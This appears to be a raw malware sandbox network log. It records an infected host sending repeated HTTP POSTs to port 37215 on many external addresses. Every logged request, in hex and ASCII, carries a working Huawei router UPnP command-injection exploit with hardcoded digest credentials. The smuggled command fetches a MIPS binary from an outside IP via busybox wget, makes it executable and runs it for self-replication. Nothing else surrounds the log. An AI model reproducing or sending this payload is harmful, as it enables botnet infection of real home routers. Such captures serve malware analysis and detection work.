69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2805192.168.2.2345466197.3.250.3437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649400949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2806192.168.2.234561241.254.210.1337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649418116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2807192.168.2.2356678197.218.85.2137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649418116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2808192.168.2.2346418197.118.208.5637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649418116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2809192.168.2.2344482197.54.233.19237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649554968 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2810192.168.2.2337456110.215.39.16437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649564028 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2811192.168.2.2339192197.140.147.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649571896 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2812192.168.2.2345668197.197.233.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649575949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2813192.168.2.2344126203.73.141.6637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649662018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2814192.168.2.2356180157.20.94.17737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649662018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2815192.168.2.2343146197.140.185.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.649729013 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
